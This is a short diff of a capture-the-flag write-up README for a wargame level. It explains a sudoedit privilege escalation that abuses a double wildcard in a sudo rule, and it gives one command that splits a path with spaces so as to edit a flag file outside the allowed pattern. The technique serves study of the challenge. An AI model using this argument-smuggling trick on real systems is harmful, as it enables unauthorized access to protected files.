aas-n/ndh2018/README.md

 User level7 may run the following commands on harmonie-technologie:
     (level7_OK) NOPASSWD: sudoedit /wargames/level7/*/*/hello.html
 ```
 The double wildcard catches our attention.
 We look for a privilege escalation exploit on internet and find [this](https://www.exploit-db.com/exploits/37710/).
-But, we are not allowed to create files in these directories.
-But there is a way to fool our `sudoedit`.
+Unfortunately, we are not allowed to create files in these directories.
+But there is a way to fool our `sudoedit` with spaces.
 ```bash
 sudoedit -u level7_OK /wargames/level7/ validation/flag /hello.html
 ```